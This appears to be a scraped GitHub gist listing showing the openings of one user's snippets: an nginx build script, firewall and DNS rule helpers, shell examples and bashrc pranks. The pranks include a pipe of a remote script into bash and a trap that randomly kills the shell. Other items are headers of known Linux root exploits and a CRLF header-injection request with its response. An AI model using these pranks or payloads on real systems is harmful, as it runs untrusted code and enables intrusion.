I hereby claim:
- I am yoramvandevelde on github.
- I am yoram (https://keybase.io/yoram) on keybase.
- I have a public key ASCWllnVtkiiXmGkq-GudwXvcbOUhPs3kzHm-pLwpppZ4Ao
To claim this, I am signing this object:
#!/usr/bin/env bash | |
# names of latest versions of each package | |
export NGINX_VERSION=1.11.1 | |
export VERSION_PCRE=pcre-8.38 | |
export VERSION_LIBRESSL=libressl-2.4.1 | |
export VERSION_NGINX=nginx-$NGINX_VERSION | |
#export NPS_VERSION=1.9.32.10 | |
#export VERSION_PAGESPEED=v${NPS_VERSION}-beta | |
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/python | |
""" | |
Produces a Linux Netfilter u32 rule to match DNS requests for a given | |
domain name and/or a given query type. | |
Typical usage: | |
% python generate-netfilter-u32-rule.py --qname ripe.net --qtype ANY | |
Can be embedded in iptables' invocations for instance: | |
rule=$(python generate-rule.py args...) |
#!/bin/bash | |
# author: Yoram van de Velde ( [email protected] ) | |
# Examples of why pipefail is really important to use. | |
# We enable exit on error functionality | |
set -o errexit | |
# These commands will fail but not stop the script because of the pipes | |
# to succesfull commands. This works because error is output to stderr, |
# https://www.quora.com/Bash-shell-What-are-the-best-bashrc-pranks/answer/Baptiste-Fontaine | |
trap '[ "$RANDOM" -le 2000 ] && exit' DEBUG | |
# confuse the damn kids | |
export PS1='C:${PWD////\\\\}> ' | |
# sysadmin's april fouls rickroll | |
curl -s -L https://raw.githubusercontent.com/keroserene/rickrollrc/master/roll.sh | bash | |
# poor man's sl |
/* | |
* diane_lane_fucked_hard.c | |
* | |
* Linux vmsplice Local Root Exploit | |
* By qaaz | |
* | |
* Linux 2.6.23 - 2.6.24 | |
*/ | |
#define _GNU_SOURCE | |
#include <stdio.h> |
/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption | |
* Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit | |
* | |
* coded by: sgrakkyu <at> antifork.org | |
* http://kernelbof.blogspot.com | |
* | |
* | |
* NOTE: you need at least one sctp application bound on the target box | |
* | |
* Supported target: |
/* | |
* Linux Kernel <= 2.6.37 local privilege escalation | |
* by Dan Rosenberg | |
* @djrbliss on twitter | |
* | |
* Usage: | |
* gcc full-nelson.c -o full-nelson | |
* ./full-nelson | |
* | |
* This exploit leverages three vulnerabilities to get root, all of which were |
# Problem with header manipulation because of CRLF injection | |
# on nginx this is because of $host$uri usage over $host$request_uri | |
$ echo -e "GET /%0D%0ASet-Cookie: hack%0D%0AX-FoRwArDeDFor: yoram HTTP/1.1\r\nHost: $HOSTNAME\r\n" | \ | |
ncat $HOSTNAME 80 | |
HTTP/1.1 301 Moved Permanently | |
Server: nginx | |
Date: Thu, 01 Apr 2021 10:15:40 GMT | |
Content-Type: text/html | |
Content-Length: 162 | |
Connection: keep-alive |
# Run as administrator | |
netsh advfirewall firewall add rule name="allow xdebug" dir=in action=allow protocol=TCP localport=9003 |